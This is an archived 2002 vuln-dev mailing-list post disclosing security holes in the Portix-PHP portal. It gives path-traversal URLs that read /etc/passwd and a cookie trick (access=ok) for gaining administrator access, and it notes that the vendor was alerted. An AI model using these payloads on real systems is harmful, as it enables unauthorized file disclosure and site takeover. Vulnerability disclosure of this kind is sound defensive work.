Big Security Holes in Portix-PHP Portal
From: frog frog (leseulfrog@hotmail.com)Date: 01/31/02
- Previous message: Gabriel A. Maggiotti: "Script to find domino's users"
- Next in thread: Frog Frog: "Re: Big Security Holes in Portix-PHP Portal"
- Reply: Frog Frog: "Re: Big Security Holes in Portix-PHP Portal"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 31 Jan 2002 16:19:47 -0000 From: frog frog <leseulfrog@hotmail.com> To: vuln-dev@securityfocus.com('binary' encoding is not supported, stored as-is)
On all version. The last one is 0.4.02 .
To view files in the hard disk :
www.hostportix.com/index.php?l=../../../etc/passwd
www.hostportix.com/index.php?
l=forum/view.php&topic=../../../etc/passwd
To be administrator :
Send the cookie name=access value=ok
to /config/config.php .
Portix team has been alerted.
- Previous message: Gabriel A. Maggiotti: "Script to find domino's users"
- Next in thread: Frog Frog: "Re: Big Security Holes in Portix-PHP Portal"
- Reply: Frog Frog: "Re: Big Security Holes in Portix-PHP Portal"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
